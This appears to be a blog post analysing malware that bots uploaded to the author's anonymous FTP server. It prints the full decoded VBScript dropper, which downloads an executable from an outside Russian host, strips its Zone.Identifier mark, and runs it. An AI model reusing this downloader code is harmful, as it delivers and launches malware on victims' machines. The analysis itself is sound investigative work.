Ok, now that you've waited long for a post, I guess your expectations are equally low. So here's The World's Least Exciting Adventure in reverse-engineering and hacking exploration.
You see, I run an FTP server. It comes in quite handing when moving files quickly between platforms that lack the necessary tools for things like ssh/scp and so on. Like an Amiga 600, for example.
Anyway, on this FTP server I have foolishly allowed for anonymous FTP uploads. Not downloads, mind you, I have no interest in serving files for the dark web and ending up on the naughty list. Once a file is uploaded it is unreadable for anonymous users.
I visit the incoming directory once every blue moon, just to clean up the mess of files uploaded by what's apparently bots. Files like Photo.scr, GXHLGSL.txt, info.zip, IMG001.exe and so on. I remove them, but they reappear after a while, when the next bot stops by.
The uploaded files are obviously viruses, randomware, backdoor installers or something along those lines, but the curiosity got the best of me, so I executed IMG001.exe to see what happened.
Just kidding, I didn't execute it, but I ran the
strings command on Linux on it, just to have a peek at its contents, and maybe get a clue. After scrolling through a couple of pages of garbage, some interesting data started to appear -- there were traces of an installer! This file is actually generated by a genuine installer, NSIS version 2.46.
What's even better is that 7zip will gladly extract the installer package without hesitation. Not the installer script per se, but the contents embedded.
I was left with one file, info.vbe, which I suspect the installer would have configured to be executed automatically, maybe as a start-up item. The .vbe extension means this file is an encrypted Visual Basic script, so it's unreadable as-is. Luckily, a guy called Didier Stevens did a decoder in Python, which runs just fine under Linux. Running his script on the vbe file revealed the following short, but simple script:
Set WshShell = CreateObject("WScript.Shell") If Instr(1,WScript.FullName,"WScript.exe",1)>0 Then WshShell.Run "CScript """&WScript.ScriptFullName&"""",0: WScript.Quit End if Tmp=WshShell.ExpandEnvironmentStrings("%TEMP%")&"\tmp2.exe" strFileURL = "http://www.testswork.ru/tmp2.exe" strHDLocation = Tmp Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") objXMLHTTP.open "GET", strFileURL, false objXMLHTTP.send() If objXMLHTTP.Status = 200 Then Set objADOStream = CreateObject("ADODB.Stream") objADOStream.Open objADOStream.Type = 1 objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 0 Set objFSO = Createobject("Scripting.FileSystemObject") If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation Set objFSO = Nothing objADOStream.SaveToFile strHDLocation objADOStream.Close Set objADOStream = Nothing End if Set objXMLHTTP = Nothing Echo=DosCommand("cmd /c (echo [ZoneTransfer] & echo ZoneId=0) > "&Tmp&":Zone.Identifier",2000) Echo=DosCommand("cmd /c "&Tmp&" ",2000) WScript.Quit Function DosCommand(command,sleep) Set WshExec=WshShell.Exec(command): WScript.Sleep sleep: WshExec.Terminate() DosCommand=WshExec.StdOut.ReadAll
In short, it tries to download
tmp2.exe from a (presumably compromised) website in Russia, and then execute it. What this
tmp2.exe file does is hard to tell, as it was deleted from the web server at the time of testing. As I mentioned earlier, I guess we could expect some sort of ransomware, virus, botnet client, crypto miner or something similar.
Super simple, super stupid. But since it's a thing, I guess it works.
The next time the file appears I'll be quicker and have a look at the file it wants to download as well.
Maybe you've experienced the same and wanted to know, too. In that case, now you do - at least a portion of it.